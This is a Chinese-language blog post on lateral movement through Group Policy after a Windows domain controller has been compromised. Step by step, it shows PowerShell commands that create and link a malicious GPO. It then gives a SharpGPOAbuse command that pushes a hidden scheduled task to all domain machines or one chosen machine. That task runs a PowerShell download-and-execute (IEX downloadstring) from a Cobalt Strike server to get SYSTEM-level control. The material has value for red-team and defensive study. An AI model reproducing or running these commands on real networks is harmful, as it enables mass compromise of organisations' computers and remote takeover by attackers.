组策略(GPO)横向移动

最新推荐文章于 2024-05-16 09:52:26 发布
最新推荐文章于 2024-05-16 09:52:26 发布
阅读量415 收藏
点赞数
分类专栏: 域安全 文章标签: java windows 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129848942
版权

文章目录

组策略横向移动简述
在拿下目标域控之后需要的靶标可能在其他机器上,并且不知道具体信息
可以通过下面GPO组组策略上线到CS翻找相关靶标资料,或者是遇到特殊环
境必须使用组策略才可以进行横向移动,总的来说组策略进行横向移动适合
大量机器上线也可以用于单一机器上线控制下面将结合CS进行利用演示。
利用组策略上线域内机器
利用步骤:
1.拿下域控权限并创建GPO。
2.将GPO链接到域内需要域管权限。
3.使用SharpGPOAbuse.exe工具添加计划任务上线到cs
利用步骤1:
需要管理员权限创建名为hack123的GPO:
shell powershell -c Import-Module GroupPolicy;new-gpo -name hack123

在这里插入图片描述

利用步骤2:
链接hack123 GPO
shell powershell -c Import-Module GroupPolicy;new-gplink -name hack123 -Target 'dc=test,dc=com'

在这里插入图片描述

利用步骤3:
工具下载:
	https://github.com/FSecureLABS/SharpGPOAbuse
利用:

在这里插入图片描述

SharpGPOAbuse.exe 全部机器上线参数如下:		
execute-assembly /home/kali/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author test\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('替换为CS的Web Powershell地址'))\"" --GPOName hack123
SharpGPOAbuse.exe 指定机器上线参数如下:		
execute-assembly /home/kali/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author test\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('替换为CS的Web Powershell地址'))\"" --GPOName hack123 --FilterEnabled --TargetDnsName 指定机器目标IP
需要注意如果直接粘贴CS的Powershell需要注意hidden -c 后面的\

在这里插入图片描述

强制更新组策略默认更新是90分钟:
shell gpupdate /force

在这里插入图片描述
上线后是System权限
在这里插入图片描述

总结
本篇讲解了如何使用GPO组策略下发CS控制全域机器以及单个机器的控制上线,
在大型网络中通过GPO上线全部机器的情况是比较少的因为如果机器太多会导致
CS卡顿因此非特殊情况不会上线全部机器,只会上线单个机器。
虚构之人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
域渗透基础_域渗透实战下gpo策略利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1449
计划任务 每次需要删除计划的配置文件 ,更改任务名 重新下发文件,计划任务的文件路径放在sysvol目录下,域渗透实战下gpo策略利用. startup 重启登录 文件必须放在 gpo配置的指定目录下 如果有修改sysvol的权限 可以尝试替换 Startup 以及 计划任务的配置文件 域渗透基础_Gpp策略 域内的组策略,在创建gpo之后,可以设置 执行命令的功能,适用于在有适当的域控制权限针对特定目标机器进行执行命令或者批量下发命令的功能 所有的域策略保存在 域渗透基础_SYSVOL
策略(GPO)利用与横向移动
蚁景网安学院
12-21 1136
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬组策略...
探索 SharpGPOAbuse:利用组策略对象安全漏洞的利器
最新发布
gitblog_00084的博客
05-16 332
探索 SharpGPOAbuse:利用组策略对象安全漏洞的利器 项目地址:https://gitcode.com/FSecureLABS/SharpGPOAbuse 在网络安全的世界里,发现并利用潜在的安全漏洞是至关重要的。今天,我们向您推荐一个名为 SharpGPOAbuse 的强大工具,这是一个由 MWR InfoSecurity Labs 创建的 .NET 应用程序,旨在帮助安全研究人员和管...
GPO中的常用策略Common policies in a GPO
weixin_34405925的博客
09-28 144
转载出处:http://hi.baidu.com/xenapp/blog/item/634edc5bcc35bcd09c820429.html 最近很多人问我组策略中的内容,不过可以理解有些组策略相对比较难找,因为太多。不过要成功一个合格的Microsoft system engineer你必须是一个成功的GPO高手。以下两个是常用的但又难以找到的策略。给大家分享: 1. GPO的计算机策略应...
什么是gpo,gpt,gpc(活动目录组策略
weixin_34248258的博客
02-05 912
关键词:活动目录组策略 什么是gpo,gpt,gpc? gpo策略对象,gpc组策略容器,gpt组策略模板gpc是一个活动目录容器,他包含gpo的属性,本身的配置信息,版本等。gpc包含的容量不大,但非常基本,通过gpc可以访问gpo的另一部分信息gpt数据存储位置和版本。gpt是一个具有层次结构的共享目录,gpt存放于域控中,包含所有的组策略信息。包括管理模板,安全,...
利用GPO(组策略对象)批量控制域内主机
热门推荐
Shanfenglan's blog
09-01 22万+
前提 拥有更改某组策略的权限或者域管权限 能够达到的效果 一次性控制域内所有配置了指定组策略的主机 利用思路 这里借鉴三好学生的原话: 根据不同情况,有以下两种利用思路: 1、新建组策略,创建计划任务实现远程执行 创建一个新的GPO并链接到对应的域 备份GPO 修改Backup.xml和gpreport.xml 创建ScheduledTasks.xml 还原GPO 强制客户端刷新策略 清理操作痕迹 第二步到第五步可以通过脚本直接实现 2、修改已有组策略,替换计划任务 如果域控制器上已有策略并配置了计
powershell 批量修改组策略GPO连接实例
03-11
标题中的“powershell 批量修改组策略GPO连接实例”指的是使用PowerShell脚本来批量管理组策略对象(Group Policy Objects, GPO)的链接。PowerShell是Windows操作系统中的一个命令行工具,它提供了强大的自动化和...
策略GPO设置2008
05-10
策略GPO设置windows server 2008 希望对你有所帮助,谢谢!
策略加载过程分析,域控
07-06
5. 客户端在重新应用 AD 组策略的时候,就是直接去 \\域名\SYSVOL\域名\Policies\{GPO 的 GUID}\ 中复制所有的文件和文件夹,复制到 C:\WINDOWS\system32\GroupPolicy 目录中,然后套用 Registry.pol 的设置。...
server2012组策略
01-28
server组策略配置文档及详细说明文 件 server组策略配置文档及详细说明文 件
GPO策略编程实现
07-18
3. **组策略对象管理**:使用诸如`New-GPO`、`Set-GPO`和`Add-GPPermission`等PowerShell cmdlet,或者C#、VB.NET等编程语言中的Microsoft.GroupPolicy命名空间,可以创建、修改和分配GPO。 **编程实现组策略** ...
gpo 软件限制策略_什么是GPO(组策略对象)? 如何在Microsoft Windows中使用,更改GPO?...
cunjiu9486的博客
10-11 3476
gpo 软件限制策略Group Policy is a feature provided by Windows operating systems in order to manage the different operating systems, user, account, and similar settings. Group policy mainly used for centrali...
GPO与DACL
qq_18811919的博客
10-13 1291
GPO与DACL
web安全day10:通过实验理解windows域的OU和GPO
小梁的博客
12-11 1436
我们已经知道,通过在dc上创建新用户,新用户就可以登录连接到域的计算机。问题是,使用dc中的用户名登录到计算机后,是否对该计算机拥有完全控制权限呢? 答案是不行的。 我们既希望用户能对自己的电脑拥有完全控制权,但是又不希望将其域用户的权限提升到域管理员。我们应该怎样做呢? 我们知道,计算机是有本地管理员组的,我们能不能将域中的普通用户加入本地管理员组呢? 答案是可以的。 我们先使用域管理员身份登录该计算机。 右键我的电脑--计算机管理--本地用户和组 我们可以看到在组中
PowerShell 脚本域策略管理
weixin_30449239的博客
03-20 299
大中型企业中,会设置许多组策略进行日常运维管理 ,毕然里面也存在许多废弃的策略,需要我们定期清理我们的组策略信息。通常我们导出HTML报告方式来帮助我们分析组策略信息: #1 首先需要加载GroupPolicy模块: Import-Module GroupPolicy 将GPO导出为一个HTML报告: Get-GPOReport -All -ReportType htm...
2022年全国职业技能大赛-网络系统管理赛项:Windows&GPO:组策略与系统配置
君逍遥o
11-19 1321
1、所有的服务器不需要按ctrl+alt+del交互式登录; 2、关闭所有机器的睡眠功能 3、所有计算机都不允许登录Microsoft账户; 4、允许IT组进行系统时间修改 5、设定所有职务为managers的用户为本地管理员,除了域控制器
如何使用域组策略(AD GPO)分发软件安装以及卸载[1.31.2013更新]
weixin_34245169的博客
11-21 3247
1.用域管理员帐号登录某一域成员Server,添加Group Policy Management 的Feature . 2.在命令行里面输入GPMC.msc,回车打开Group Policy Management. 3.找到相应的Group Policy,右击选择Edit. 4.在打开的Group Policy中: 选择Computer ...
Window server 2012 R2 AD域的组策略设置
My Inspiration World _" Franz °
10-18 9万+
1.AD域的组策略添加有助于管理AD域中的用户使用的client端的环境。 2.组策略依附于AD域的OU构成 3.使用“gpmc.msc”在运行里面打开,或者是在“开始—管理工具”里面打开 4.在打开的组策略管理界面里面,林kaka下的DefaultDomain Policy为全局策略,而只对计算机做了配置。   一、简单组策略的建立实现: 来做一个实例说明组策略的简单实现: 要求:
GPO 管理员: 简单恢复GPO更改
weixin_42434696的博客
07-19 1684
GPO 管理员: 简单恢复GPO更改 无论您只有一些组策略对象(GPOs)还是有成百上千个,您知道这给您的AD环境带来复杂性。每位GPO管理员都会担忧,每个GPO更改带来易被忽视地和潜在地风险,导致中断某些或者全部的电脑网络。大多组织通过设置特许权限的方式组织这些改动。但是,即便是老练成熟的GPO管理员也常常会犯错误,耗费数小时去恢复设置。 让我来提醒您组策略的局限性,这样我们就基于同一个层面。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值